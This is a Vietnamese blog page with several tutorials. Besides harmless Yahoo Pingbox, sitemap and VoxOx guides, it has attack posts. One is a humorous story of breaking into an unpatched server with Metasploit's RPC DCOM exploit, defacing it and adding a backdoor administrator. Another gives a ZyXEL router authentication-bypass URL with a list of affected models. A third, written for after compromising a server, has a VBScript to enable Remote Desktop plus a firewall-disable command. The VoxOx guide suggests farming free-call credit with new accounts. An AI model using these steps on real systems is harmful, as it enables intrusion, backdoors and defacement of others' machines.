Thứ Sáu, 30 tháng 1, 2009

Nhúng Yahoo! Messenger vào web cá nhân

Cùng lúc với việc phát hành phiên bản Yahoo! Messenger 9.0 tiếng Việt, Yahoo! cũng khai trương dịch vụ Pingbox - dịch vụ cho phép bạn nhúng Yahoo! Messenger vào website cá nhân (hoặc blog) để bạn có thể chat với khách viếng thăm trên website của mình.Để nhúng Pingbox vào website của bạn, hãy làm theo các bước sau:
Bước 1: Vào trang Pingbox và nhấn nút Tạo Pingbox
Bước 2:
+ Hãy click chọn ảnh nền, màu chữ, font chữ cho Pingbox sao cho phù hợp với thiết kế website của bạn. Các thay đổi sẽ được cập nhật tại Pingbox mẫu ở phía tay phải để bạn có thể xem lại ngay.
+ Hãy chọn lời chào hỏi mặc định khi bạn đang Online hoặc tin nhắn lại khi bạn đang Ofline. Bạn có thể chọn các câu có sẵn hay tự tạo một câu mới.
* Mẹo: Nếu khi gõ tiếng Việt trực tiếp trên trang Pingbox mà bạn không nhận được hiển thị tiếng Việt thì hãy mở Notepad lên, gõ dòng chữ muốn hiển thị vào Notepad (đương nhiên là font Unicode). Sau đó copy dòng chữ đã gõ và paste vào ô Chào hỏi hoặc Tin nhắn của Pingbox.+ Chọn tên hiển thị trên Pingbox.
+ Chọn tên của Pingbox trong mục Lưu Pingbox dưới tên. Lưu ý là danh sách khách vào website của bạn mà đang đăng nhập vào Yahoo! sẽ được hiển thị trong danh sách Messenger dưới tên nhóm là tên của Pingbox mà bạn đã chọn.
Khi đã vừa ý với Pingbox của mình bạn nhấn nút Tiếp.
Bước 3:
+ Hãy chọn cách tạo mã HTML - Chỉ mã thôi hoặc tạo mã cho Friendster và Blogger (dùng riêng cho các blog này) bằng cách click vào tab tương ứng.
+ Chọn kích cỡ mà Pingbox sẽ hiển thị trên website của bạn. Bạn có thể chọn kích thước định sẵn hoặc chọn kích thước tùy ý.
+ Việc cuối cùng là click vào nút Copy vào clipboard để copy đoạn code vừa được cung cấp vào clipboard.
Bước 4: Bước còn lại là trên website (hay blog) của bạn:
Hãy paste đoạn code (mã HTML) đã copy vào vị trí bạn sẽ bố trí khung chat Pingbox trên website của bạn. Sau đó upload lên host để cập nhật lại website.
Để sử dụng pingbox, bạn hãy đăng nhập vào Yahoo! Messenger, lúc này trên khung pingbox sẽ hiển thị trạng thái Online của bạn và từ bây giờ bạn có thể thoải mái trao đổi với bạn bè, khách viếng tham ngay trên chính blog hoặc website của mình.




Bảo Bảo

Thứ Tư, 28 tháng 1, 2009

Cách tạo sitemap cho Yahoo!

Yahoo! cũng giống như Google, đều có thể dễ dàng đánh chỉ mục dữ liệu trên website của bạn nếu bạn cung cấp cho nó một danh sách các URL trỏ đến các trang cần index dữ liệu hay còn gọi là sitemap. Trong bài viết này tôi sẽ hướng dẫn bạn cách tạo sitemap cho Yahoo! để Yahoo có thể đánh chỉ mục cho website bạn dễ dàng hơn.Sau khi thiết kế website hoàn tất, bạn cũng muốn người dùng tìm đến website của mình thông qua các máy chủ tìm kiếm. Và Yahoo! cũng là một máy chủ tìm kiếm đáng để bạn quan tâm.Tạo sitemap cho Yahoo! rất đơn giản, Yahoo! chỉ hỗ trợ các sitemap có định dạng .txt và với tên urllist.txt vì vậy bạn cần tạo file text với tên như thế. Sau đây là các bước để tạo và submit sitemap của bạn đến Yahoo!
Click lên start > Run > chọn chương trình Notepad.
Copy các URL bạn muốn Yahoo đánh chỉ mục vào file trên, mỗi URL là một hàng.
Lưu file với tên urllist.txt và upload lên thư mục web.
Truy cập vào địa chỉ: https://siteexplorer.search.yahoo.com/
Thêm website hoặc blog của bạn vào Yahoo! bằng cách click vào nút Add My Site
Yahoo! sẽ yêu cầu bạn đăng nhập bằng tài khoản của mình, hãy đăng nhập bằng tài khoản Yahoo! của bạn.
Click lên nút Authenticate sau khi đăng nhập thành công.
Để xác nhận chủ quyền website, Yahoo! sẽ yêu cầu bạn add một thể Meta hoặc upload 1 file HTML lên website của mình.
Upload file hoặc thêm thẻ Meta như yêu cầu của Yahoo!, sau đó bạn click vào nút Ready to Authenticate.
Trong trường hợp sử dụng Blog, bạn nên thêm thẻ Meta sẽ thuận tiện hơn.Xong ! Giờ thì bạn chỉ cần chờ đợi Yahoo! đánh chỉ mục website mình mà thôi.

Thứ Hai, 19 tháng 1, 2009

Ếch Con giở chiêu đột nhập vào WebServer của Tư Nòng Nọc

Lưu ý : Bài viết này là demo chứng minh cho tầm quan trọng của việc quản trị mạng chứ không phải hướng dẫn các bạn đi "chôm" pasword ! Đối với vai trò 1 Administrator thì không phải build up một network cho chạy là xong, mà phải kiểm soát và phải có phương hướng bảo mật cho network của mình. (Các tên nhân vật và tình huống câu chuyện là do tôi hư cấu)

****

Như các bạn đã theo dõi bộ truyện nhiều tập "CHÔM PASSWORD VÀ ĐỌC LÉN MAIL CỦA SẾP", đã biết qua các nhân vật như :

- Ếch Con là lính của Sếp Hai Nhái : thích tìm tòi học hỏi những cái mới và thích châm chọc những người tự cao tự đại.

- Tư Nòng Nọc là lính của Sếp Ba Cóc : thích khoe khoang mặc dù không biết gì, giang hồ có câu "Điếc hay ngóng, ngọng hay nói" thì Tư Nòng Nọc đã có 7 phần trong đó smile_embaressed

****

Cũng vào một dịp nhậu nhẹt tại quán Thu Nở có đầy đủ các nhân vật Hai Nhái, Ếch Con, Ba Cóc, Tư Nòng Nọc. Đang vào tháng 9 nên Phan Thiết có đặc sản là cá Tắc Kè và cá Bò hòm (*). Vô được 5-6 chai ken thì Hai Nhái nhớ "bài lai" vụ laptop của mình shutdown lâu lắc và hay đòi restart liền hỏi Ếch. Ếch ta trả lời là do Windows update các bản vá lỗi cho an toàn nên phải restart lại mới ... "ép phê". Nghe đến đây thì Tư Nòng Nòng nọc "xìiiii" 1 tiếng rõ to và nói rằng "chú chỉ khéo vẽ trò, mình cài Windows xong rồi đặt password thật khó là không ai phá được. Như bản thân anh cài máy "con server" ở cơ quan cũng có update gì đâu mà vẫn chạy tốt. Hôm nào chú sang anh giở vài chiêu xem có làm ăn gì được không vì anh đặt password ... dài lắm, haha". Ếch Con nghĩ thầm "hãy đợi đấy, rồi có lúc ông anh sẽ thấy việc quan trọng của update. Nu! pododi (**)".

Bẵng đi một thời gian, Ếch Con lại có dịp sang cơ quan của Ba Cóc. Cũng như lần trước, nó cũng xin một sợi cable mạng để vào Internet. Nó nhớ lại vụ hôm trước và truy cập vào WebServer của cơ quan Ba Cóc (nó biết được IP nội bộ không khó vì khi nó dùng lệnh "net view" thì thấy có computer tên là WebServ). Hmmm, gớm nhỉ, "Security by Tư Nòng Nọc" luôn cơ à, nếu như theo lời Tư Nòng Nọc không update Windows thì hãy xem thằng Ếch này đây.

picture001

- Thằng Ếch liền download Meta Framework 3.1 để chuẩn bị "ảo thuật" đột nhập vào WebServer.

- Sau khi download xong thì nó liền Install vào.

picture002

- Trong quá trình cài đ8ạt Metasploit Framework 3.1 thì có yêu cầu cài thêm Nmap, thằng Ếch cài luôn.

picture003

- Finish rồi, chạy chương trình thôi

picture004

- Metasploit Framework đang khởi động.

picture005

- Ui chu choa, giao diện ngầu quá đi smile_omg

picture006

- Sau khi chương trình start xong, nó liền search 1 cái lỗi mà nó biết qua trang milw0rm.com là lỗi "rpc dcom".

picture008

- Đây rồi, click vô 1 cái.

picture009

- Đây rồi Windows NT/2000/XP/2003 đều có thể "chơi" được, click forward 1 cái.

picture010

- Thằng Ếch nó chọn shell_bind_tcp, forward cái nữa.

picture011

- Điền IP của Webserver vào, mọi thứ để default rồi forward tiếp.

picture012

- Chương trình detect, đợi thành công thì nhấn apply 1 cái.

picture013

- Oh yeah ! thằng ếch nó cười nham hiểm vì thấy phiên làm việc (session) đã được khởi tạo.

picture014

- Thằng Ếch liền chọn Interact Session.

picture015

- Haha, lấy được CMD rồi, giở chiêu quậy phá thôi.

picture016

- Ếch dùng lệnh "dir" để xem đĩa C:\ của Server và tạo 1 folder "Server_bi_hack" để cảnh báo.

picture017

- Chưa đủ trò quậy phá nó liền sữa trang chủ của website thành nội dung "Tư Nòng Nọc bị đứt đuôi rồi"

picture018

- Truy cập lại xem cái coi, oh ! đẹp quá đi smile_wink Mất tiêu cái "Security by Tư Nòng Nọc" rồi.

picture019

- Ngoài ra nó còn tạo thêm 1 user tên ech và cho vào group Administratos luôn. Chà, nó có thâm ý gì đây nhỉ smile_omg

picture020

- Oh ! nó chạy chương trình Remote Desktop Connection, thì ra là nó muốn quản lý Server bằng giao diện luôn. hihi

picture021

- Nó nhập IP WebServer vào rồi chọn Connect

picture022

- Nó nhập user ech và password vừa tạo vào.

picture023

- Tèn ten ten ten, đăng nhập được vào Server với quyền Administrator luôn rồi. Chiến này Tư Nòng Nọc khổ dài dài rồi.

picture024

Hihi, vậy là Tư Nòng Nọc hết dám khoe khoang lộn chỗ rồi phải không các bạn. Và các bạn cũng đã thấy cái hại của việc không cập nhật bản vá lỗi thường xuyên rồi đấy nhé, sau này các bạn nhớ update windows thường xuyên nha.

----------------

Bugs lỗi trên ADSL Zyxel

Hầu hết các khách hàng sử dụng Internet của FPT Telecom thường được tặng Router ADSL Zyxel. Nhưng trên Router ADSL Zyxel vẫn còn một bugs lỗi khá lâu vẫn còn tác dụng khai thác. Bugs có thể Bypass authentication reset modem và upload firmware khác.

Truy cập vào Router với đường dẫn: http://x.x.x.x/rpFWUpload.html (phân biệt hoa thường)

Bypass ZyXEL

Loại Router có thể khai thác:

- ZyXEL Prestige 600
- ZyXEL Prestige 645R-A1
- ZyXEL Prestige 650H
- ZyXEL Prestige 650HW
- ZyXEL Prestige 650HW-31
- ZyXEL Prestige 650R
- ZyXEL ZyNOS IS.3, IS.5, V3.40(ES.5), 3.40

---------

* Trong ví dụ này tôi sử dụng ADSL Router ZyXEL Prestige 600

BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1. Trên Server kiểm tra remote desktop chưa bật.

picture001

B2. Trên máy Attacker, telnet vào Server

picture002

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

picture003

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on


set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next

B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

picture004

B5. Dùng lệnh dir kiểm tra

picture005

B6. Chạy file remote.vbs để bật remote desktop.

picture006

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

picture007

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

picture008

B9. Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

picture009

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.

Sử dụng lệnh rdesktop [hostname]

picture010

B11. Nhập username/password của Administrator

picture011

B12. Truy cập thành công với quyền Administrators

picture012

Have a nice day smile_wink
daoduyhieu.spaces.live.com

Thứ Năm, 25 tháng 12, 2008

VoxOx - Gọi Điện Thoại Nhắn Tin Miễn Phí

Đầu tiên, truy cập vào trang web VoxOx.com | Take Controldownload chương trình VoxOx. Chương trình này gần giống như Y!M (Yahoo! Messenger) mà mọi người hay dùng, nhưng điểm khác biệt là bạn có thể nhắn tin miễn phí (100%) và gọi điện nhiều hơn Y!M. Bên cạnh đó chương trình cũng tích hợp nhiều IM chát khác như: 'Yahoo, MSN, AIM, ICQ, Jabber, Google Task' và các Feed khác nữa. Cấu hình yêu cầu tối thiểu của VoxOx:

System Requirements Amount
OSWindows XP or Vista
Processor1 GHz
RAM256 MB

System Requirements Amount
OSIntel Based - Mac OSX (10.5 Leopard)
Processor1 GHz
RAM256 MB

Các bạn sẽ cài đặt bình thường, ai không biết thì G thua (nữ thì G chỉ cho :D)

Bước 1: Sau khi cài đặt, các bạn mở biểu tượng VoxOx trên desktop (mặc định)


Giao diện VoxOx

Bước 2: Nhấp vào 'Sign up for a username' để đăng ký một account. Tiếp theo sẽ hiện cái bảng 'Get Your VoxOx ID':


Enter Information

Sau khi đã điền đầy đủ (bỏ phần 'Invite code') nhấn vào nút 'I accept' để làm bước tiếp theo.

Bước 3: VoxOx hiện lên bảng 'LAST STEP... PLEASE VERIFY THAT YOU ARE A REAL
PERSON BY CHOOSING THREE PICTURES OF NATURE BELLOW '
các bạn sẽ làm chọn 3 tấm ảnh có liên quan đến thiên nhiên.


No Spam VoxOx

Tiếp theo, nhấn vào 3 tấm ảnh nói về thiên nhiên các bạn nhấp vào 'I am a Human' để xác nhận.

Sau đó, VoxOx sẽ hiện lên bảng thông báo đã gởi link kích hoạt và các bạn vào mail của mình để nhấn vào link kích hoạt


Finally Registered VoxOx

Bây giờ, các bạn có thể login để bắt đầu làm việc chính.


Login VoxOx

Bước 4: Sau khi, đăng nhập VoxOx sẽ hiện lên cái bảng Wizard để hướng dẫn đi từng bước để điền đầy đủ thông tin (cái này có thể bỏ qua).


Wizard VoxOx

Vào trong VoxOx sẽ thấy giao diện:


Skin Logined VoxOx

Call Phone - Gọi Phone
Bước 5: Các bạn có thể nhấn vào nút Keypad hoặc thẻ Keypad để bắt đầu công việc phone.


Keypad VoxOx


Ở tab Keypad, 'Drop Menu' 'Select the country are dialing' chọn Quốc Gia bạn muốn gọi. 'Enter the phone number in ...' nhập số điện thoại vào. Có 2 cách nhập số điện thoại vào (Mặc định theo quốc gia) theo công thức:

Điện thoại bàn: Mã Nước + Mã Vùng + Số Phone

Điện thoại di động: Mã Nước + Mã Mạng + Số Phone
Ví dụ: 0939492737 thì sẽ nhấn: +84939492737

Sau khi nhập đầy đủ rồi thì nhấn nút (phone màu xanh lá cây) để call.


Cúp máy nhấn vào nút (phone màu đỏ).


Lưu ý: Thời Gian gọi ở VoxOx là 12 phút đối với Việt Nam (ở nước khác thì 2 tiếng).

Bạn có thể gọi 2 phone cùng lúc (dành cho ai tay 3). Nhấp vào 'Conference' và add vào 2 số điện thoại cần phone đến:


Call 2 number phone

Nếu đã reg xong, gọi hết $V 100 thì reset modem để đăng ký account khác với mail khác.

Send Messenger - Gởi Tin Nhắn - Free 100%

Bước 6: Add danh sách 'Yahoo, MSN, AIM, ICQ, Jabber và Google Task' vào trong VoxOx. (Bước này không thể thiếu khi nhắn tin, nó dùng để add nick người đó vào hoặc bất kỳ ai và sau đó bạn có thể hiện menu nhắn tin điện thoại).

Các bạn bắt đầu dùng 'Wizard' các bạn cứ nhấn next.


Sau đó đến bảng bên dưới. Nhấp vào biểu tượng 'Yahoo, MSN, AIM, ICQ, Jabber và Google Task' (tùy bạn có account nào thì add account đó). Sau đó, nhấn 'Next' và tiếp tục.


Các bước các bước tiếp theo bạn tự điền nếu không cần thiết thì 'Netxt'. Vậy là kết thúc bước tạo danh sách 'Nhắn Tin'.

Có cách khác đơn giản và nhanh hơn, đó là nhấp vào Menu -> Tool -> Configuration...


Chọn 'Tab Account' và nhấn vào nút 'add' và chọn IM mà bạn muốn thêm vào (Yahoo chẳng hạn) 'Save'. Các bạn có thể tự tìm hiểu các tab còn lại.

Trở lại, Tab Contact các bạn nhấp chọn một nick bất kỳ để hiện lên bảng.


Tiếp theo, đó nhấp vào biểu tượng (Điện thoại và Tin Nhắn).


Hiện lên cái bảng, các bạn nhập số điện thoại cần nhắn tin vào và nhấn vào nút 'Start Conversation' để bắt đầu nhắn tin. (Đừng kêu bạn mình nhắn lại nhe! Cái này G chưa test).





Lưu Ý: Đánh không dấu vì một số phone không nhận được có dấu. Đánh xong thì nhấn nút 'Send'

The End - Mark Thank To Support

Bài đăng phổ biến